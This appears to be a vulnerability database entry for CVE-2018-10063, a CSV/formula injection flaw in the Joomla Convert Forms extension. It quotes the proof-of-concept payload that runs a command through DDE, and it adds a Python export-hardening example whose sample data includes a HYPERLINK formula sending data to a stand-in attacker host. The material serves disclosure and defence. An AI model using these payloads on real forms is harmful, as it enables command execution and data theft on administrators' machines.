https://www.exploit-db.com/exploits/44447
https://cxsecurity.com/issue/WLB-2018040100
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201804-600
Joomla! Convert Forms Extension Security Vulnerability
| Field | Value | Field | Value |
|---|---|---|---|
| Vulnerability ID | 1124969 | Vulnerability type | Command injection (CSV/formula injection) |
| Published | 2018-04-12 | Updated | 2019-10-23 |
| CVE | CVE-2018-10063 | CNNVD | CNNVD-201804-600 |
| Platform | PHP | CVSS score | 6.8 |
Vulnerability source
Vulnerability details
Joomla! is an open-source content management system (CMS) developed by the US-based Open Source Matters team; it provides RSS feeds, site search and related features. Convert Forms is a form-builder extension for Joomla!.
Convert Forms 2.0.3 and earlier (fixed in 2.0.4) contain a CSV (formula) injection flaw, which CNNVD classifies as command injection. A remote, unauthenticated attacker submits a form field whose value begins with a formula trigger character; when a privileged user later exports the submissions to CSV and opens the file in a spreadsheet application, the formula is evaluated and can run commands on that user's machine.
Exploit
# Exploit Title: Joomla Extension Convert Forms version 2.0.3 is vulnerable to Formula Injection (CSV Injection)
# Google Dork: N/A
# Date: 12-04-2018
################################
# Exploit Author: Jetty Sairam
################################
# Software Link: https://extensions.joomla.org/extensions/extension/contacts-and-feedback/forms/convert-forms/
# Affected Version: 2.0.3 and before
# Category: Plugins and Extensions
# Tested on: WiN7_x64
# CVE : CVE-2018-10063
1. Application Description:
Convert Forms provides a framework to build custom forms for Joomla users.
2. Technical Description:
Convert Forms version 2.0.3 is affected by Remote Command Execution using CSV Injection. This allows a public user to inject commands as part of form fields; when a user with higher privileges exports the form data to CSV and opens the file on their machine, the command is executed.
3. Proof Of Concept:
Enter the payload @SUM(1+1)*cmd|' /C calc'!A0 in the form fields and submit.
When a high-privileged user logs into the application, exports the form data to CSV and opens the file,
the formula is executed and the calculator pops up on their machine.
4. Solution:
Upgrade to version 2.0.4
https://extensions.joomla.org/extensions/extension/contacts-and-feedback/forms/convert-forms/
5. Reference:
https://vel.joomla.org/resolved/2160-convert-forms-2-0-3-csv-injection
https://www.tassos.gr/blog/convert-forms-2-0-4-security-release
https://vel.joomla.org/articles/2140-introducing-csv-injection
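The export flow the advisory describes, shown here as an added Python example rather than Convert Forms' own PHP code: the same submissions written to CSV verbatim (the vulnerable behaviour) and with formula-triggering cells neutralised. The column names, the sample submissions and the helper names are constructed for this example; only the `@SUM(...)` payload comes from the PoC above.

```python
import csv
import io

# Leading characters that make Excel, LibreOffice and Google Sheets evaluate a
# CSV cell as a formula: '=', '+', '-', '@', tab and carriage return.
FORMULA_TRIGGERS = frozenset("=+-@\t\r")

# Column layout assumed for this example (not Convert Forms' real schema).
FIELDNAMES = ["name", "email", "message"]

# Constructed sample submissions: one benign, one carrying the advisory's
# payload, one with a leading space before the trigger character.
SAMPLE_SUBMISSIONS = [
    {"name": "Alice", "email": "alice@example.com", "message": "Hello"},
    {"name": "@SUM(1+1)*cmd|' /C calc'!A0", "email": "x@example.com",
     "message": '=HYPERLINK("http://attacker.example/?"&A1,"click")'},
    {"name": " -2+3+cmd|' /C calc'!A0", "email": "y@example.com", "message": "ok"},
]


def is_formula_like(value):
    """True if a spreadsheet would treat this cell as a formula.

    Leading spaces are skipped before the check, which is deliberately
    conservative: a value such as " =1+1" is flagged even though not every
    importer evaluates it. Only the first character matters, so an '@'
    inside an e-mail address is not flagged.
    """
    if not isinstance(value, str):
        return False
    stripped = value.lstrip(" ")
    return bool(stripped) and stripped[0] in FORMULA_TRIGGERS


def neutralize_cell(value):
    """Make a cell safe for export.

    A leading single quote forces Excel and LibreOffice to treat the cell as
    literal text. Wrapping the field in double quotes is NOT enough on its own:
    the CSV parser strips those quotes before the cell content is interpreted.
    Non-string values (numbers, None) are returned unchanged.
    """
    if is_formula_like(value):
        return "'" + value
    return value


def export_submissions(rows, fieldnames=FIELDNAMES, harden=True):
    """Render submissions as CSV text.

    harden=False reproduces the vulnerable behaviour the advisory describes:
    whatever the public user typed goes into the cell verbatim.
    """
    buf = io.StringIO()
    writer = csv.DictWriter(buf, fieldnames=fieldnames,
                            quoting=csv.QUOTE_ALL, lineterminator="\n")
    writer.writeheader()
    for row in rows:
        if harden:
            row = {k: neutralize_cell(v) for k, v in row.items()}
        writer.writerow(row)
    return buf.getvalue()


def flag_submissions(rows):
    """Return (row index, field) pairs whose value looks like a formula.

    Useful for logging or alerting at submission time, independent of the
    export-side fix.
    """
    return [(i, k) for i, row in enumerate(rows)
            for k, v in row.items() if is_formula_like(v)]


if __name__ == "__main__":
    print("--- vulnerable export ---")
    print(export_submissions(SAMPLE_SUBMISSIONS, harden=False))
    print("--- hardened export ---")
    print(export_submissions(SAMPLE_SUBMISSIONS))
    print("flagged:", flag_submissions(SAMPLE_SUBMISSIONS))
```

The single-quote prefix is the mitigation spreadsheet-oriented guidance usually recommends, but it shows up literally to any non-spreadsheet consumer of the CSV; where that matters, rejecting or flagging formula-like values at submission time (as `flag_submissions` does) is the alternative.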
References
Source: www.tassos.gr
Link: https://www.tassos.gr/blog/convert-forms-2-0-4-security-release